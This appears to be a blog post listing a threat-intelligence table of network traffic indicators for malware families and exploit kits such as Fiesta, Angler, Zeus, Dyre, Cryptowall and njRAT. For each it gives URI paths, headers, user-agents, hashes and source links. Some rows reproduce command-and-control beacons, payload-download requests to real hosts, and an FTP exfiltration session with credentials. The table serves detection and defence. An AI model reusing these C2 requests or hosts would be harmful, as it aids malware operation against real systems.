Monday, February 3, 2014

Traffic pattern listing - Redirect

See the full Traffic Patterns table: 


This post is for search engines (as they don't index Google Spreadsheet data)


family method uri path2 header ua port md5s ref_url
Carberb / /Glupteba GET "<p>/get_ads.php?yy=1&aid=2&atr=exts&src=199
<p>/go/p1011105.subexts
<p>/go/page/landing_page_68?nid=14&layout=qna&pid= p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1
<p>/javascript/live_cd/popunder_script-1400195675.js
<p>/images/ffadult/css/header.css
<p>/css/live_cd/ffadult/chinese/0/global_facelift-1414007370.css" "<p>/get_ads.php?yy=1&aid
<p>/go/
<p>/live_cd/
<p>/ffadult/" 80 85acec48c593832bdd57f90aec783a28 http://malware-traffic-analysis.net/2014/12/25/index.html
Fiesta EK GET "<p>/?_SPMq=vahK1gfvq3&z1_Aj =fW8sL8ld&nkPgy= 81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf= fu5dv5&wDK9=Ydqk1z4o6&52YRK=eHl9jdJ8j&I86 __=He0S4m9G
&QPy3i=J4HP58S7h&dRPS8=7bi7Y
<p>/?3W_wN=I40_W5_&eht =t8vP8M8L&2ad_uO= 33KPa&_s3oi=8P5_7&QLfo= cHai8w&ZM7P_K=bSG7TH3p&UKb38= 1s4wx2s&jSJyB=cM7c
<p>/?sk9=7ufJ8Ky7H8nS34n7f1h8t887R49&eDf= 1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR
<p>/?_I4XS=idKbueq4kR1q8&0TsZ= Y0Wn7Lbr6K9hch&thXvW=56WPaqG2OdJ0&Ff_lty= x21dbrs8y5
<p>/?m_FxE=eh0&MkFq=H8GeS&fz7= 1l3&d2T6r=ae&LeH_9= k0Il2W&Z7i6=3S1&7h_ =Sdlc&zmGAU=i0uf&mMwf=ehp5p& ymV7T=y7lKe&Jpk_DF=_5_2" /? 80 http://malware-traffic-analysis.net/2014/12/26/index.html
Fiesta EK GET "<p>/yzzzpiehxpvij8ps46znskyaqfa5ijkduakhxwcbj9
<p>/ai_qkvu2/4a374fcc5b4966050058040c015d5253005 2030f0f5201530f54070e0507525450;118800;94
<p>/ai_qkvu2/074f70a95a1651de5952585d020b5009040 4045e0c0403090b02005f0651500e54" /ai_qkvu2/ 80 http://malware-traffic-analysis.net/2014/12/17/index.html
Gongdad / Gong Da compromised site redirects GET "<p>/pg/kcp/index.html
<p>/popup/index.html
<p>/my/by4.html" http://malware-traffic-analysis.net/2014/12/13/index.html
Gongdad / Gong Da EK GET "<p>/data/file/cr/index.html 
<p>/data/file/cr/swfobject.js
<p>/data/file/cr/jquery-1.4.2.min.js
<p>/data/file/cr/main.html
<p>/data/file/cr/AyVpSf.jar
<p>/data/file/cr/com.class
<p>/data/file/cr/edu.class
<p>/data/file/cr/net.class
<p>/data/file/cr/org.class /windos.exe" /data/file/cr/ http://malware-traffic-analysis.net/2014/12/13/index.html
Dalexis Loader GET "<p>/tmp/pack.tar.gz
<p>/assets/pack.tar.gz
<p>/piwigotest/pack.tar.gz
<p>/histoiredesarts/pack.tar.gz
<p>/fit/pack.tar.gz" /pack.tar.gz 80 http://blog.malcovery.com/blog/ctb-locker-the-newest-crypto-malware-now-via-spam
Gholee / Rocket Kitten GET / POST "<p>/index.php?c=Ud7atknq&r=17117d
<p>/index.php?c=Ud7atknq&r=1710b2" /index.php?c= 80 http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html
Zemot GET /b/shoe /b/shoe 80 http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html
Zemot DL via Asprox GET /catalog/159 /catalog/159 80 https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf
Zemot downloading Rovnix GET /mod_jshopping_products_gdle/mod_smartslider2/ /mod_smartslider2/ 80 https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf
Zemot downloading Rerdom GET /mod_jshoppi/soft32.dl /soft32.dl 80 https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf
Rerdom GET /b/eve/<redacted> /b/eve/ 8080 https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf
Clickfraud GET /b/req/<redacted> /b/req/ 80 https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf
Cidox / Rerdom / Clickfraud GET "<p>/b/eve/e91425775cc5d7e657bd2cc7
<p>/b/letr/21D84379F768D95442B92BC5
<p>/b/opt/E1805AD5D79824076249D696
<p>/b/req/FDD953BA382388758DF27AE4
<p>/b/pkg/<redacted>
" "<p>/b/eve/
<p>/b/letr/
<p>/b/opt/
<p>/b/req/
<p>/b/pkg/" 80 http://www.malware-traffic-analysis.net/2014/07/21/index.html
Cidox / Rerdom / Clickfraud - clickurl GET GET /x/48petqwk9/<redacted>/AA/0 /x/48petqwk9/ 80 https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf
Cidox / Rerdom / Clickfraud - clickurl GET GET /2014/06/26/new-game-tech-behind-scenes-sony -playstation with referrer http://controller-best.com referrer http://controller-best.com 80
Scieron / Httneilc / HTClient "packet data <p>0000 16 03 01 00 41 01 00 00 3d 03 01 54 c1 2a fa 82
<p>0010 a5 0b 00 4c 7b 26 c9 33 81 bd 63 34 08 ab b3 38
<p>0020 3a de 83 db b1 9c 95 02 3e c3 34 00 00 16 00 04
<p>0030 00 05 00 0a 00 09 00 64 00 62 00 03 00 06 00 13
<p>0040 00 12 00 63 01 00" 8081 "<p>http://www.symantec.com/security_response/writeup.jsp?docid=2014-072320-5920-99
<p>http://www.symantec.com/connect/blogs/scarab-attackers-took-aim-select-russian-targets-2012"
Zollard RFI POST /cgi-bin/php? %2D%64+%...<long string removed php encoded>...%2D%6E /cgi-bin/php? "Host: <target server>
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1825
Connection: close" Mozilla/5.0 (compatible; Zollard; Linux) 80
Upatre GET "<p>/js/jquery-1.41.15.js
<p>/js/jquery-1.41.15.js?aCNDrnl3=[user-agent string]&hjmcSOLrVb5fK5a =1846&kZuJV1OyPrXdK0= 1267859342&OjyOcmABhJHuu=gDyC5hx734Wu1.js
<p>/js/jquery-1.41.15.js?get_message=3290013886" /js/jquery-1.41.15.js 80 a752bedbbf6b73e52e2d7f8f3cd6a227 <p> 2c7810794a5027ddfc0568808dea3437 http://malware-traffic-analysis.net/2015/01/21/index.html
Cryptowall 3.0 POST "<p>http://proxy1-1-1.i2p/fee4roy2hih9
<p>http://payto4gtpn5czl2.torforall.com/ofs20c" "i2p
torforall.com/ofs20c" 80 e67edfaa0d65e822fe41bf978ccd9c3c https://isc.sans.edu/diary/Traffic+Patterns+For+CryptoWall+30/19203
Andromeda POST /ldr.php /ldr.php Accept: text/html, application/xhtml+xml, */*::~~Content-Type: application/x-www-form-urlencoded::~~Accept-Language: en-US:: ~~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 80
Angler EK Chain GET /t19jl0hvv2.php 80
Angler EK Chain GET /752s2n0ndw.php 80
Angler EK Chain GET /erL0pIvz9_wyAlk2koy7L4b2qScYutODp2Cm dYZyW hw1bW9lGM8EDW8cKKjx47cp 80
Angler EK Chain GET /P-SqI9OgILhp9clsf2ne5wgWHy4i2ew2hy 48WScNKA 9m2DKeiJNTp7gSxYSPcXsN 80
Angler EK Chain GET /models/runway/ring/header.js 80
Angler EK Chain GET /code/decrease/revenue/core.js 80
Asprox / Kuluoz GET "/include.php?t=20lB5S+e4qW48vWs/RXbneRWTR9t JTB67xoumOnEvak=
<p>HTTPS over port 443 as a possible connectivity check" /include.php?t= 80 http://malware-traffic-analysis.net/2015/01/02/index.html
Asprox / Kuluoz POST /index.php /index.php 80 http://malware-traffic-analysis.net/2015/01/02/index.html
Chanitor POST /gate.php /gate.php Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0 80
Chanitor Downloads GET "<p>/wp-includes/js/tinymce/plugins/wpfullscreen/1.php
<p>/wp-includes/js/tinymce/skins/lightgray/1.php
<p>/wp-content/plugins/motopress-content-editor /flexslider/fonts/1.php
<p>/wp-includes/js/tinymce/plugins/wpfullscreen/1.php" /1.php 80
Cryptowall POST "<p>/532boskc3i0
<p>/nvebi4m4ggdokz
<p>/wbkljtzpimbryt" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) 80
Cryptowall GET "
<p>/wp-content/themes/exiportal/dh5x3a1815j 
<p>/wp-content/themes/esther/6l7de" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) 80
Dridex payload GET "<p>/mopsi/popsi.php
<p>/js/bin.exe" "/popsi.php
/bin.exe
" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) 80
Fake AV post compromise GET /?0=13&1=1&2=15&3=i&4=7600&5=0&6=1111&7 =kyxnujmwnn 80 http://www.malwaresigs.com/2014/02/07/fakeav-is-still-alive/
Fiesta EK GET "<p>/txf9p_v8/ye1PlchZ7X9pFcl0o-y3
<p>/txf9p_v8/14dcb5b6b53272fd050d5358500e540100 0750585657520d0400060703005305 ;114402;287
<p>/txf9p_v8/4dc239e53174afbc5d010f0901025302055 75709075b550e01500156520c5406" /txf9p_v8/ 80 http://malware-traffic-analysis.net/2015/01/20/index.html
Flashpack EK GET /sv62a76d18537/index.php /index.php 80
GameThief POST /tj.asp /tj.asp 80
GameThief GET /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP& iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack /count.asp?mac= 80 http://malware-traffic-analysis.net/2015/01/03/index.html
Gypothy GET "/bigbight/kinkong.txt
" /kinkong.txt ~~Accept-Language: en-US::~~Accept-Encoding: gzip, deflate::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)::~~Host: adakaobiri.com::~~Connection: Keep-Alive::~~ Accept-Language: en-US::~~Accept-Encoding: gzip, deflate::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) 80
H-W0rm POST /SpCoderHere |pcname|hostname|username .. other pc data 80
KaiXin EK GET "<p>/indexindex/
<p>/indexindex/gg.jpg
<p>/indexindex/jquery-1.4.2.min.js
<p>/indexindex/swfobject.js
<p>/indexindex/main.html
<p>/xzz1.exe
<p>/indexindex/NlNwQh.jar
<p>/indexindex/com.class
<p>/indexindex/edu.class
<p>/indexindex/net.class
<p>/indexindex/org.class" /indexindex/ 80 http://malware-traffic-analysis.net/2015/01/03/index.html
Kovter POST "<p>/9/form.php 
<p>/11/form.php
<p>/w1/form.php
<p>/1/feed.php" /form.php "Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MALC; rv:11.0) like Gecko
Host: b7-golfix.org
Content-Length: 368
Cache-Control: no-cache" Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MALC; rv:11.0) like Gecko 80
Nuclear EK GET / POST "<p>/XhBWV0gBT08OVFVW.html
<p>/AwoVGwxQAEcOVRleDlRTBgMFR0tUV1YOVFcAHA JDQUhXVlxUVgdOVRtA
<p>/ABsJAkgKUURCGlYaShlWAAACQUJfV1RCGVYEBh 1GRlVLVEJLVgUBT0AONi0fCB0j
" 80 http://malware-traffic-analysis.net/2015/01/18/index2.html
Poweliks GET "<p>/query?version=1.7&sid=1101&builddate=201214&q= low+testosterone+in+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
<p>/query?version=1.7&sid=1101&builddate=201214&q= fast+weight+loss&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
<p>/query?version=1.7&sid=1101&builddate=201214&q= pain+in+knee+cap&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
<p>/query?version=1.7&sid=1101&builddate=201214&q= anti+aging+cream+for+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; I Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2" ?version=1.7&sid= ls=2 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) 80
Redirect to Fiesta EK GET "/?iVXpY9be=J8v3ax4v1&V5=1lM9es5-U2&npv_F-g= aPp8X- 02- GbU&b-nd9=-2-7nwdGa9Y&_6nQ=Y90gT9oPejrdO &
m_h=bv_8fzs0m6H&Zg_-tWd=f-bj0I9sai&hfUK=b3" 80 http://malware-traffic-analysis.net/2015/01/20/index.html
Sweet Orange EK GET "<p>/admin4_account/mobile/movies.php?timeline=18
<p>/bad/generic/help.php?state=39
<p>/cnet/tmp/Indy_admin/investor.php?setup=20
<p>/dbadmin/wp-admin/hex/help.php?state=33
<p>/forums/example/screens/investor.php?setup=20
<p>/gcc/tmp/bad/help.php?state=25
<p>/ip/ch/investor.php?setup=20
<p>/profiles/stat/movies.php?timeline=21" "<p>/timeline=18
<p>/state=39
<p>/setup=20
<p>/state=33
<p>/state=25
<p>/timeline=21
<p>/timeline=20
<p>/france=155
<p>/state=31
"
Sweet Orange EK GET "<p>/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064
<p>/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064&errfix=urepair
<p>/printer.php?rates=1764&catalogp=4&pixel=294&speeches=171 &shows=2171&trans=867&misc=1087&urepair=errfix
<p>/store.php?back=669&nav_m=75&sendmail=4&stats=1186 &logout=171&state=2215&CRIME=2249
<p>/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535
<p>/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535&repfix=fixutil
<p>/teen.php?cpan=2441&soma=4&subs=2093&pipermail=171 &feed=2093&film=663&comp=954
<p>/serial.php?help=805&browsers=4&about=2398&icons=171 &music=247&sony=430&work=2315

" "<p>/printer.php
<p>/store.php
<p>/teen.php
<p>/serial.php

<p>/fixutil=repfix
<p>/repfix=fixutil 
" 80
TBD POST /store/ /store/ 80 http://malware-traffic-analysis.net/2015/01/20/index2.html
TBD Post Flashpack GET "<p>/r?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ
<p>/search?q=wrestling&subid=4699
<p>/click?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ" /r?q= /search?q= /click?q= 80 http://malware-traffic-analysis.net/2015/01/20/index.html
TBD Proxy (Htbot?) GET "<p>/ocfg.php?command=getip
<p>/ocfg.php?command=getid
<p>/ocfg.php?command=ghl&id=1493496
<p>/ocfg.php?command=dl&id=1493496
<p>/ocfg.php?command=version&id=1493496
<p>/ocfg.php?command=getbackconnect
<p>/pointer.php?proxy=<IP>%3A24635&secret=BER5w4evtjszw4MBRW" /ocfg.php?command= 80 http://malware-traffic-analysis.net/2015/01/12/index.html
Upatre GET "<p>/1501us22/<PC--NAME>/0/51-SP3/0/
<p>/1501us22/<PC--NAME>/1/0/0/
<p>/2807cw/<PC-Name>/1/0/0/
<p>/2807cw/<PC-Name>/41/5/4/
<p>/2807cw/<PC-Name>/0/51-SP2/0/
<p>/1201uk1/<PC-Nam/0/61/0/ 
<p>/1201uk1/<PC-Name>/0/51-SP3/0/ 
<p>/1201uk1/<PC-Name>/1/0/0/ 
<p>/1201uk1/<PC-Name>/41/7/4/ ""
<p>/2307stat/<PC-Name>/0/51Service%20Pack%202/0/
<p>/2307stat/<PC-Name>/1/0/0/
<p>/2307stat/<PC-Name>/41/5/4/
" "
<p>/1201uk1/
<p>/2307stat/
<p>/2807cw/ 
<p>/1501us22/" Mozilla/5.0, Host: <IP:port>, Cache-Control: no-cache 80
Vavtrak / Neverquest POST /collection/0000004E/00/9EBD6132 /collection/ 80 http://malware-traffic-analysis.net/2015/01/18/index2.html http://malware-traffic-analysis.net/2015/01/18/index2.html
Zeus GET "<p>/backup/config.bin
<p>/en/images/config.bin
<p>/guardnow/config.bin
<p>/guardnow/config.bin" /config.bin Accept: */*::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)::~~Host: 104.192.103.10::~~Content-Length: 128::~~Connection: Keep-Alive::~~Cache-Control: no-cache::~~::~~\030\206-yV\264;\376[\270\021\244(k\353\253\001\206\311\376^\336AGZp\323\342E\324\325\323\333"\342\234\010\214\255\257\363S\343f$\274)\356= Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) 80
Zeus POST /choosen/helps/file.php /helps/file.php Accept: */*::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)::~~Host: 104.192.103.10::~~Content-Length: 128::~~Connection: Keep-Alive::~~Cache-Control: no-cache::~~::~~\030\206-yV\264;\376[\270\021\244(k\353\253\001\206\311\376^\336AGZp\323\342E\324\325\323\333"\342\234\010\214\255\257\363S\343f$\274)\356= Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) 80
AdWare Kraddare.IL GET /bv/config.php?q=^/irW@RwOC6RKkFiJgWt_ESwGQKBP... <very long string> ..@RwNPRwNN:: /config.php?q=^/irW@ 80 http://totalhash.com/analysis/4851fcb8933220d2cb1187ab769bf96e3624b2ed
AdWare Kraddare.IL POST /bv/config.php /config.php 80 http://totalhash.com/analysis/4851fcb8933220d2cb1187ab769bf96e3624b2ed
Dyre GET /2001uk11/HOME/1/0/0/ /HOME/1/0/0/ "User-Agent: Mozilla/5.0
Host: 202.153.35.133:33384
Cache-Control: no-cache" Mozilla/5.0 80 https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/
Dyre GET /mandoc/eula012.pdf /eula012.pdf "Accept: text/*, application/*
User-Agent: Mozilla/5.0
Host: clicherfort.com
Cache-Control: no-cache" Mozilla/5.0 80 https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/
Dyre GET /mandoc/ml1from1.tar /ml1from1.tar "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Host: essextwp.org
" Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/
Dyre plugin dl GET /ineede900.rar 80
Kazy GET /cmd/api.php?mk=20140708041847777&action= get_availability&partoffer_id=11229&a2=FR /api.php?mk= 80 https://www.virustotal.com/en/file/411e52c674faac375570a8786bf88bd849dbccc4aaa895aa59c6a3c0c568ccac/analysis/
Mudrop GET /gcs?alpha=YBvfs8NDNYK3vSEO+ p6fL2KZts4yS8inp2oWpqiDOinE/IJmP6Ktx9+Px+c= /gcs?alpha= "Host: api.greenerweb.info
Cache-Control: no-store,no-cache
Pragma: no-cache
Connection: Keep-Alive"
ChePro (Brazil.banker) GET /ini/xvwmmwb.mod /xvwmmwb.mod "Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.aspramece.com.br
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) "2A5E5D3C536DA346849750A4B8C8613A (RTF dropper)
6D78F17AC2E4B95A671B079F25DD3B79 (RTF dropper)" http://www.securelist.com/en/blog/208214122/Brazilian_bankers_gone_wild_now_using_malicious_Office_files
Cryptolocker POST /home/ /home/ "Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: rwyngtbvunfpk.org
Content-Length: 192
Connection: Close" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) 9cbb128e8211a7cd00729c159815cb1c http://nakedsecurity.sophos.com/2013/10/12/destructive-malware-cryptolocker-on-the-loose/
Reedum 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] "220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]
USER user37704
331 .................. ............ ...... ........................ user37704
PASS intro22
230 ........................ user37704 ..................
TYPE A
200 ...... .................... .. A
PORT 10,0,2,15,4,24
500 ........................ .............. PORT
LPRT 6,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,4,24
500 LPRT .... ...................." 0ca4f93a848cf01348336a8c6ff22daf http://www.naked-security.com/malware/Infostealer.Reedum/
Vidgrab POST (172.16.253.130)|1067|WinXP|D|L|No| 0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|. "....3
HTTP/1.1 301 Moved Permanently
Location:http://windowsupdate.microsoft.com/
Content-Type: text/html
Connection: Keep-Alive
<h1>Bad Request (Invalid Verb)</h1>
.....HK|(172.16.253.130)|1067|WinXP|D|L|No|0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|." 660709324acb88ef11f71782af28a1f0 http://contagiodump.blogspot.com/2013/09/sandbox-miming-cve-2012-0158-in-mhtml.html#more
Page / stscout / Elise / lStudio / Wumins GET /29af9cdc/page_12082223.html /page_ "Accept: */*
Cookie: XX=0; BX=0
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Host: gorush.dyndns-web.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache" Mozilla/4.0 (compatible; MSIE 8.0; Win32) 443 aaf73666cbd750ed22b80ed836d2b1e4 http://www.fireeye.com/blog/technical/exploits-vulnerabilities/2012/09/analysis-of-malware-page.html#more
Tijcont GET /s/blog_b2afd7fe01019tkf.htm /blog_ "/3.txt
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 110.34.198.123:888
Connection: Keep-Alive

/s/blog_b2afd7fe01019tkf.html
User-Agent: getURLDown
Host: blog.sina.com.cn

/album/w=1600;q=90/sign=862e65d610dfa9ecfd2e521152e0cc72/9358d109b3de9c82a5a5fe456d81800a18d84333.jpg
User-Agent: loadMM
Host: e.hiphotos.bdimg.com" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) ** User-Agent: getURLDown ** User-Agent: loadMM 80,6000,8888, 845b0945d5fe0e0aaa16234dc21484e0 http://my.opera.com/cjbi/blog/index.dml/tag/Tijcont
Darkcomet GET /a.php?id=c2ViYWxpQGxpYmVyby5pdA== /a.php?id= "/a.php?id=c2ViYWxpQGxpYmVyby5pdA==
Host: [ip.address]" none dc98abba995771480aecf4769a88756e http://www.contextis.com/research/blog/malware-analysis-dark-comet-rat/
Kelihos GET /index.htm /index.htm "
Host: 188.129.243.106
Content-Length: 164
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0

..D.lUUE..H@.q..#.....K.zfgE0F.A..K.

Variants:
/default.htm ** /file.htm ** /home.htm ** /index.htm ** /install.htm ** /login.htm ** /main.htm ** /online.htm ** /search.htm ** /setup.htm ** /start.htm ** /index.htm" "Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)
Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)
Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3)
Mozilla/5.0 (Windows NT 5.0; rv:21.0)
Mozilla/5.0 (Windows NT 5.1)
Mozilla/5.0 (Windows NT 5.1; rv:21.0)
Mozilla/5.0 (Windows NT 6.1; rv:21.0)
Mozilla/5.0 (Windows NT 6.1; rv:22.0)
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0)
Mozilla/5.0 (Windows NT 6.2)
Mozilla/5.0 (Windows NT 6.2; rv:21.0)
Mozilla/5.0 (Windows NT 6.2; WOW64)
Mozilla/5.0 (X11; Linux i686; rv:21.0)
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0)
Opera/9.80 (Windows NT 5.1; U; zh-sg)
Opera/9.80 (Windows NT 6.0)
Opera/9.80 (Windows NT 6.1; U; es-ES)" 1052 C94DC5C9BB7B99658C275B7337C64B33 http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor%3AWin32%2FKelihos.F#tab=2
Kuluoz Run command from C2 n "
c=run&u=/get/7d2c37d2070e1b38 6070db8c851dae08.exe&crc= 9e2b9c4f465 b765fc971423935c4b68e" &crc= "HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 27 Aug 2013 20:06:57 GMT
Content-Type: text/html
Content-Length: 86
Connection: close
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding"
njRAT / Backdoor.LV "<p> lv|'|'|TndfQzQyNjRFQkI=|'|'|VICTIM|'|'| Examiner|'|'|2013-06-21|'|'|USA|'|'| Win XP ProfessionalSP2 ...

<p> 171.ll|'|'|Li4uLi4uLk5FVy4uLi4u Li4uX0F FNTJDMzdE|'|'|SENTA|'|'| sentai55|'|'|15-01-29|'|'||'|'| Win 8.1SP0 x64|'|'|Yes|'|'|0.7d| '|'|..|'|'||'|'|b88ece4c04f706 c9717bbe6fb da49ed2,132.inf|'|'|Li4uLi4uLk5FVy4uL i4uLi4uDQpyZWVlZWVk LmR5bmRucy5iaXo6M jUyNTQNCkFwcERhdGENCldpbnJhci5leG UNClRydWUNCkZhbHNlDQpU cnVlDQpGYWxzZQ==0.

<p> 251.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX0FFNTJD MzdE|'|'|SENTA|'|'|sentai55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'|QnVyd 2VsbCB2LiBIb2JieSBMb2JieSBBYnJpZGdlZCBbQ29tcGF0aWJpbGl0eSBNb 2RlXSAtIFdvcmQA|'|'|b88ece4c04f706c9717bbe6fbda49ed2,

<p>lv|'|'|VHJvamFuX0M0NkY2RTk= |'|'|MARK|'|'|user |'|'|2013-11-22|'|'||'|'|Win XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof]" "<p> lv <p> 171.ll <p> 251.ll
" 1d3baedd747f6f9bf92c81eb9f63b34b http://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njrat-uncovered.html
Chimerka.1 / Refyes.A POST /sys.php /sys.php "Host: rxform.org
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6
Referer: http://www.gmail.com
Content-length: 112" Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6 bede0da1abc1122acf8af91f6d6b289f http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:Win32/Refeys.A#tab=2
Sality GET /images/logos.gif?1f5428=8212640 /logos.gif? "User-Agent: Opera/9.50 (Windows NT 6.0; U; en)
